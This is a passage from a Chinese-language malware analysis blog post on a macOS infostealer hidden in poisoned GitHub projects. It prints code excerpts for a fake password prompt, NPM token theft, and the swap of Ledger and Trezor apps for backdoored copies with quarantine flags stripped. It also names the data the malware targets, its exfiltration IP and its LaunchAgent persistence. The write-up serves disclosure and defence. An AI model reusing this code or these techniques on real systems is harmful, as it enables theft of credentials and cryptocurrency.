AppleScript 弹出一个伪造的系统授权对话框。</span></p><div style="margin: 10px 8px;border-radius: 8px;border: 1px solid rgb(200, 208, 219);background: rgb(234, 238, 243);overflow: hidden;"><p style="text-align: right;padding: 4px 10px 2px;background: rgb(212, 218, 226);border-bottom: 1px solid rgb(200, 208, 219);"><span style="font-size: 11px;line-height: 1.4;color: rgb(58, 80, 112);font-family: &#34;Fira Code&#34;, Menlo, &#34;Operator Mono&#34;, Consolas, Monaco, monospace;letter-spacing: 0px;"><span leaf="">applescript</span></span></p><pre style="margin: 0px;border: none;border-radius: 0px;box-shadow: none;background: transparent;font-size: 14.4px;line-height: 1.5;overflow-x: auto;padding: 0px !important;"><code language="applescript" style="display: block;padding: 0.5em 1em 1em;overflow-x: auto;text-indent: 0px;color: rgb(0, 25, 58);white-space: nowrap;word-break: normal;overflow-wrap: normal;margin: 0px;font-size: inherit;line-height: inherit;border: none;border-radius: 0px;background: transparent !important;"><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">repeat</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">set</span></span><span leaf=""> result to display dialog </span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;Required Application Helper. Please enter password for continue.&#34;</span></span><span style="color: rgb(0, 72, 171);"><span leaf="">default</span></span><span leaf=""> answer </span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;&#34;</span></span><span style="color: rgb(0, 72, 171);"><span leaf="">with</span></span><span leaf=""> icon caution buttons {</span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;Continue&#34;</span></span><span leaf="">} </span><span style="color: rgb(0, 72, 171);"><span leaf="">default</span></span><span leaf=""> button </span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;Continue&#34;</span></span><span leaf=""> giving up after </span><span style="color: rgb(76, 129, 201);"><span leaf="">150</span></span><span style="color: rgb(0, 72, 171);"><span leaf="">with</span></span><span leaf=""> title </span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;Application wants to install helper&#34;</span></span><span style="color: rgb(0, 72, 171);"><span style="color: rgb(0, 72, 171);"><span leaf="">with</span></span><span leaf=""> hidden answer</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">set</span></span><span leaf=""> password_entered to text returned of result</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">if</span></span><span style="color: rgb(0, 72, 171);"><span leaf="">checkvalid</span></span><span leaf="">(</span><span leaf="">username, password_entered</span><span leaf="">) then</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">        -- 验证成功后，将密码保存至本地，供后续高危操作使用</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">savePasswordToKeychain</span></span><span leaf="">(</span><span leaf="">password_entered</span><span leaf="">)</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">writeText</span></span><span leaf="">(</span><span leaf="">password_entered, writemind &amp; </span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;pwd&#34;</span></span><span leaf="">)</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">return</span></span><span leaf=""> password_entered</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">    end </span><span style="color: rgb(0, 72, 171);"><span leaf="">if</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">end repeat</span></p></code></pre></div><p data-line="166" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">这个弹窗在视觉上与 macOS 原生授权弹窗如出一辙。在“刚刚运行了一个开源项目”的语境下，受害者往往会认为这是环境安装过程中正常的权限请求。一旦受害者输入了开机密码，这就成了开启灾难的万能钥匙。</span></p><h3 data-line="168" style="padding-left: 12px;border-left: 4px solid rgb(0, 82, 217);border-bottom: 1px dashed rgb(0, 82, 217);margin: 2em 8px 0.75em 0px;color: rgb(51, 51, 51);font-size: calc(19.2px);font-weight: bold;line-height: 1.2;"><span leaf="">3.2 静默“勿扰模式”</span></h3><p data-line="170" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">在拿到密码并准备开始大量打包文件、发起异常网络请求前，代码执行了这样一条系统级命令： </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">defaults write com.apple.notificationcenterui doNotDisturb -boolean true</span></code></p><p data-line="173" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">这会强制开启 macOS 的“勿扰模式”。攻击者的心思缜密到了极点——他们担心在后续的数据外传过程中，系统防火墙或安全软件的报警弹窗会惊动受害者，因此提前屏蔽了所有的系统通知。</span></p><h3 data-line="175" style="padding-left: 12px;border-left: 4px solid rgb(0, 82, 217);border-bottom: 1px dashed rgb(0, 82, 217);margin: 2em 8px 0.75em 0px;color: rgb(51, 51, 51);font-size: calc(19.2px);font-weight: bold;line-height: 1.2;"><span leaf="">3.3 高价值数据收割机</span></h3><p data-line="177" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">接下来，木马开始在后台疯狂搜刮任何有价值的数据：</span></p><ol style="list-style-type: decimal;padding-left: 1.5em;margin-left: 0px;color: rgb(51, 51, 51);" class="list-paddingleft-1"><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">浏览器全家桶劫持</span></strong><span leaf="">：遍历 Safari, Chrome, Edge, Brave 等所有主流浏览器，打包窃取 Cookies、浏览历史以及本地密码数据库（</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">Login Data</span></code><span leaf="">）。</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">加密资产收割机</span></strong><span leaf="">：精准定位并窃取超过 40 种 Web3 浏览器插件（如 MetaMask, Phantom）的 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">IndexedDB</span></code><span leaf=""> 存储目录，以及桌面端冷钱包（如 Electrum, Exodus, Wasabi）的本地数据。</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">开发者核心命脉</span></strong><span leaf="">：窃取 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">~/.ssh/</span></code><span leaf=""> 下的所有私钥对、</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">~/.aws/</span></code><span leaf=""> 云环境凭证。甚至扫描 Desktop、Documents、Downloads 文件夹，搜刮所有小体积的高敏文档（</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">.key</span></code><span leaf="">, </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">.wallet</span></code><span leaf="">, </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">.pdf</span></code><span leaf="">）。</span></p></li></ol><h3 data-line="182" style="padding-left: 12px;border-left: 4px solid rgb(0, 82, 217);border-bottom: 1px dashed rgb(0, 82, 217);margin: 2em 8px 0.75em 0px;color: rgb(51, 51, 51);font-size: calc(19.2px);font-weight: bold;line-height: 1.2;"><span leaf="">3.4 供应链纵深打击：你的 Token 沦为下一轮传播的起点</span></h3><p data-line="184" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">对于攻击者而言，普通开发者最值钱的往往不是加密货币，而是他们的</span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">生态信任</span></strong><span leaf="">。木马内置了专门的 Handler 模块，用于窃取 GitHub 和 NPM 的访问令牌（Token）。</span></p><p data-line="186" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">它不仅扫描 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">.git-credentials</span></code><span leaf="">，还会精准提取 VSCode 插件缓存在全局状态中的鉴权 Token。以 NPM 令牌窃取模块为例，代码不仅窃取 Token，还会实时向官方 API 验证其有效性：</span></p><div style="margin: 10px 8px;border-radius: 8px;border: 1px solid rgb(200, 208, 219);background: rgb(234, 238, 243);overflow: hidden;"><p style="text-align: right;padding: 4px 10px 2px;background: rgb(212, 218, 226);border-bottom: 1px solid rgb(200, 208, 219);"><span style="font-size: 11px;line-height: 1.4;color: rgb(58, 80, 112);font-family: &#34;Fira Code&#34;, Menlo, &#34;Operator Mono&#34;, Consolas, Monaco, monospace;letter-spacing: 0px;"><span leaf="">javascript</span></span></p><pre style="margin: 0px;border: none;border-radius: 0px;box-shadow: none;background: transparent;font-size: 14.4px;line-height: 1.5;overflow-x: auto;padding: 0px !important;"><code language="javascript" style="display: block;padding: 0.5em 1em 1em;overflow-x: auto;text-indent: 0px;color: rgb(0, 25, 58);white-space: nowrap;word-break: normal;overflow-wrap: normal;margin: 0px;font-size: inherit;line-height: inherit;border: none;border-radius: 0px;background: transparent !important;"><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">var</span></span><span style="color: rgb(0, 72, 171);"><span leaf="">NpmTokenHandler</span></span><span leaf=""> = </span><span style="color: rgb(0, 72, 171);"><span leaf="">class</span></span><span leaf=""> {</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">getFromNpmrcFile</span></span><span leaf="">(</span><span leaf="">) {</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">try</span></span><span leaf=""> {</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">const</span></span><span leaf=""> npmrcPath = path.</span><span style="color: rgb(0, 72, 171);"><span leaf="">join</span></span><span leaf="">(os2.</span><span style="color: rgb(0, 72, 171);"><span leaf="">homedir</span></span><span leaf="">(), </span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;.npmrc&#34;</span></span><span leaf="">);</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">if</span></span><span leaf=""> (fs.</span><span style="color: rgb(0, 72, 171);"><span leaf="">existsSync</span></span><span leaf="">(npmrcPath)) {</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">const</span></span><span leaf=""> content = fs.</span><span style="color: rgb(0, 72, 171);"><span leaf="">readFileSync</span></span><span leaf="">(npmrcPath, </span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;utf8&#34;</span></span><span leaf="">);</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">const</span></span><span leaf=""> tokenMatch = content.</span><span style="color: rgb(0, 72, 171);"><span leaf="">match</span></span><span leaf="">(</span><span style="color: rgb(0, 72, 171);"><span leaf="">/_authToken=(.+)/</span></span><span leaf="">);</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">if</span></span><span leaf=""> (tokenMatch) </span><span style="color: rgb(0, 72, 171);"><span leaf="">return</span></span><span leaf=""> tokenMatch[</span><span style="color: rgb(76, 129, 201);"><span leaf="">1</span></span><span leaf="">].</span><span style="color: rgb(0, 72, 171);"><span leaf="">trim</span></span><span leaf="">();</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">      }</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">return</span></span><span style="color: rgb(0, 72, 171);"><span leaf="">null</span></span><span leaf="">;</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">    } </span><span style="color: rgb(0, 72, 171);"><span leaf="">catch</span></span><span leaf=""> (error) { </span><span style="color: rgb(0, 72, 171);"><span leaf="">return</span></span><span style="color: rgb(0, 72, 171);"><span leaf="">null</span></span><span leaf="">; }</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">  }</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">async</span></span><span style="color: rgb(0, 72, 171);"><span leaf="">verifyToken</span></span><span leaf="">(</span><span leaf="">) {</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">try</span></span><span leaf=""> {</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">const</span></span><span leaf=""> response = </span><span style="color: rgb(0, 72, 171);"><span leaf="">await</span></span><span style="color: rgb(0, 72, 171);"><span leaf="">fetch</span></span><span leaf="">(</span><span style="color: rgb(0, 72, 171);"><span leaf="">`<a href="https://registry.npmjs.org/-/whoami`" target="_blank">https://registry.npmjs.org/-/whoami`</a></span></span><span leaf="">, {</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">headers</span><span leaf="">: { </span><span style="color: rgb(0, 72, 171);"><span leaf="">Authorization</span></span><span leaf="">: </span><span style="color: rgb(0, 72, 171);"><span leaf="">`Bearer </span><span style="color: rgb(76, 129, 201);"><span leaf="">${</span><span style="color: rgb(76, 129, 201);"><span leaf="">this</span></span><span leaf="">.token}</span></span><span leaf="">`</span></span><span leaf="">, </span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;Content-Type&#34;</span></span><span leaf="">: </span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;application/json&#34;</span></span><span leaf=""> }</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">      }).</span><span style="color: rgb(0, 72, 171);"><span leaf="">then</span></span><span leaf="">(</span><span style="color: rgb(0, 72, 171);"><span leaf="">(</span><span leaf="">res</span><span leaf="">) =&gt;</span></span><span leaf=""> res.</span><span style="color: rgb(0, 72, 171);"><span leaf="">json</span></span><span leaf="">());</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">return</span></span><span leaf=""> { </span><span leaf="">valid</span><span leaf="">: </span><span style="color: rgb(0, 72, 171);"><span leaf="">true</span></span><span leaf="">, </span><span leaf="">username</span><span leaf="">: response, </span><span leaf="">token</span><span leaf="">: </span><span style="color: rgb(76, 129, 201);"><span leaf="">this</span></span><span leaf="">.</span><span leaf="">token</span><span leaf=""> };</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">    } </span><span style="color: rgb(0, 72, 171);"><span leaf="">catch</span></span><span leaf=""> (error) { </span><span style="color: rgb(0, 72, 171);"><span leaf="">return</span></span><span leaf=""> { </span><span leaf="">valid</span><span leaf="">: </span><span style="color: rgb(0, 72, 171);"><span leaf="">false</span></span><span leaf=""> }; }</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">  }</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">};</span></p></code></pre></div><p data-line="213" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">有效的高权限 Token，将被攻击者直接用于横向扩散——用受害者的名义，向其维护的开源仓库继续投毒。被感染的开发者在不知情的情况下，被迫成为了下一批受害者的传播源。</span></p><h3 data-line="215" style="padding-left: 12px;border-left: 4px solid rgb(0, 82, 217);border-bottom: 1px dashed rgb(0, 82, 217);margin: 2em 8px 0.75em 0px;color: rgb(51, 51, 51);font-size: calc(19.2px);font-weight: bold;line-height: 1.2;"><span leaf="">3.5 最阴险的一击：狸猫换太子</span></h3><p data-line="217" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">如果在受害者的电脑里发现了 </span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">Ledger Live</span></strong><span leaf=""> 或 </span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">Trezor Suite</span></strong><span leaf=""> （两大著名硬件冷钱包的桌面客户端），木马将展现出它最令人不安的一面。</span></p><div style="margin: 10px 8px;border-radius: 8px;border: 1px solid rgb(200, 208, 219);background: rgb(234, 238, 243);overflow: hidden;"><p style="text-align: right;padding: 4px 10px 2px;background: rgb(212, 218, 226);border-bottom: 1px solid rgb(200, 208, 219);"><span style="font-size: 11px;line-height: 1.4;color: rgb(58, 80, 112);font-family: &#34;Fira Code&#34;, Menlo, &#34;Operator Mono&#34;, Consolas, Monaco, monospace;letter-spacing: 0px;"><span leaf="">applescript</span></span></p><pre style="margin: 0px;border: none;border-radius: 0px;box-shadow: none;background: transparent;font-size: 14.4px;line-height: 1.5;overflow-x: auto;padding: 0px !important;"><code language="applescript" style="display: block;padding: 0.5em 1em 1em;overflow-x: auto;text-indent: 0px;color: rgb(0, 25, 58);white-space: nowrap;word-break: normal;overflow-wrap: normal;margin: 0px;font-size: inherit;line-height: inherit;border: none;border-radius: 0px;background: transparent !important;"><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">on installWallet(walletType, baseURL, installDir)</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">if</span></span><span leaf=""> walletType </span><span style="color: rgb(0, 72, 171);"><span leaf="">is</span></span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;trezor&#34;</span></span><span leaf=""> then</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">set</span></span><span leaf=""> downloadURL to baseURL </span><span style="color: rgb(76, 129, 201);"><span leaf="">&amp;</span></span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;darwin-universal/3JqStAJCgGftaOafUiGG1A%3D%3D?wallet=trezor&#34;</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">set</span></span><span leaf=""> appsToRemove to {</span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;/Applications/Trezor Suite.app&#34;</span></span><span leaf="">}</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">else</span></span><span style="color: rgb(0, 72, 171);"><span leaf="">if</span></span><span leaf=""> walletType </span><span style="color: rgb(0, 72, 171);"><span leaf="">is</span></span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;ledger&#34;</span></span><span leaf=""> then</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">set</span></span><span leaf=""> downloadURL to baseURL </span><span style="color: rgb(76, 129, 201);"><span leaf="">&amp;</span></span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;darwin-universal/3JqStAJCgGftaOafUiGG1A%3D%3D?wallet=ledger&#34;</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">set</span></span><span leaf=""> appsToRemove to {</span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;/Applications/Ledger Live.app&#34;</span></span><span leaf="">, </span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;/Applications/Ledger Wallet.app&#34;</span></span><span leaf="">}</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">    end </span><span style="color: rgb(0, 72, 171);"><span leaf="">if</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(76, 129, 201);"><span leaf="">--</span></span><span style="color: rgb(76, 129, 201);"><span leaf="">...</span></span><span leaf=""> [省略：下载黑客服务器上带有后门的伪造同名应用 </span><span style="color: rgb(0, 72, 171);"><span leaf="">ZIP</span></span><span leaf="">] </span><span style="color: rgb(76, 129, 201);"><span leaf="">...</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">repeat</span></span><span leaf=""> with appPath </span><span style="color: rgb(0, 72, 171);"><span leaf="">in</span></span><span leaf=""> appsToRemove</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">if</span></span><span leaf=""> (</span><span style="color: rgb(0, 72, 171);"><span leaf="">do</span></span><span leaf=""> shell script </span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;test -d &#34;</span></span><span style="color: rgb(76, 129, 201);"><span leaf="">&amp;</span></span><span leaf=""> quoted form of appPath </span><span style="color: rgb(76, 129, 201);"><span leaf="">&amp;</span></span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34; &amp;&amp; echo exists || echo not_found&#34;</span></span><span leaf="">) </span><span style="color: rgb(0, 72, 171);"><span leaf="">is</span></span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;exists&#34;</span></span><span leaf=""> then</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">            my removeExistingApp(appPath) </span><span style="color: rgb(76, 129, 201);"><span leaf="">--</span></span><span leaf=""> 杀掉进程并强行删除官方正版 </span><span style="color: rgb(0, 72, 171);"><span leaf="">App</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">        end </span><span style="color: rgb(0, 72, 171);"><span leaf="">if</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">    end </span><span style="color: rgb(0, 72, 171);"><span leaf="">repeat</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(76, 129, 201);"><span leaf="">--</span></span><span leaf=""> 移除被覆盖写入的恶意 </span><span style="color: rgb(0, 72, 171);"><span leaf="">App</span></span><span leaf=""> 的 macOS 安全隔离标记</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">do</span></span><span leaf=""> shell script </span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;xattr -c &#34;</span></span><span style="color: rgb(76, 129, 201);"><span leaf="">&amp;</span></span><span leaf=""> quoted form of extractedApp </span><span style="color: rgb(76, 129, 201);"><span leaf="">&amp;</span></span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34; 2&gt;/dev/null || true&#34;</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">do</span></span><span leaf=""> shell script </span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;xattr -dr com.apple.quarantine &#34;</span></span><span style="color: rgb(76, 129, 201);"><span leaf="">&amp;</span></span><span leaf=""> quoted form of extractedApp </span><span style="color: rgb(76, 129, 201);"><span leaf="">&amp;</span></span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34; 2&gt;/dev/null || true&#34;</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">end installWallet</span></p></code></pre></div><p data-line="243" style="margin: 1.5em 8px 0px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">这是整个攻击链中破坏力最大、隐蔽性最强的环节。木马利用前面骗到的 root 权限，在后台强行卸载了正版的硬件钱包客户端，并将黑客特制的后门版客户端（带钓鱼表单收集助记词）覆盖到原路径。</span></p><p data-line="243" style="margin: 0px 8px 1.5em;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">它甚至细致到移除了 macOS 的 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">com.apple.quarantine</span></code><span leaf=""> 隔离标记，以防受害者打开被替换的 App 时弹出“应用是从互联网下载”的安全警告。冷钱包本是防御网络攻击的最后堡垒，但在这种级别的终端控制面前，就算是“冷钱包”也很难逃脱收割。</span></p><h3 data-line="246" style="padding-left: 12px;border-left: 4px solid rgb(0, 82, 217);border-bottom: 1px dashed rgb(0, 82, 217);margin: 2em 8px 0.75em 0px;color: rgb(51, 51, 51);font-size: calc(19.2px);font-weight: bold;line-height: 1.2;"><span leaf="">3.6 持久驻留与数据外传</span></h3><p data-line="248" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">在完成所有的洗劫和替换后，木马将战利品打包为 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">/tmp/out.zip</span></code><span leaf="">，并以 HTTP POST 方式传输出境（如 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">208.76.223.59/p2p</span></code><span leaf="">）。同时，它向 macOS 系统写入了一个 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">LaunchAgents</span></code><span leaf=""> 启动项（</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">com.user.nodestart.plist</span></code><span leaf="">），确保电脑每次开机，它都能自行启动。</span></p><hr style="border-style: solid;border-width: 2px 0px 0px;border-color: rgba(0, 0, 0, 0.1);transform-origin: 0px 0px;transform: scale(1, 0.5);height: 1px;margin: 2em 0px;background: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.1), rgba(0, 0, 0, 0));"/><h2 data-line="252" style="display: block;width: fit-content;padding: 0.3em 1.2em;margin: 2.5em auto 1.5em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);font-size: calc(19.2px);font-weight: bold;text-align: center;border-radius: 6px;box-shadow: none;"><span leaf="">4. 溯源拓线：一个变量名，暴露了数百个感染仓库</span></h2><p data-line="254" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">分析完样本后，我们尝试将其中一个混淆变量</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">dfhulxliqohxamy</span></code><span leaf="">输入到 GitHub 的全局代码搜索中——</span></p><p data-line="256" style="margin: 1.5em 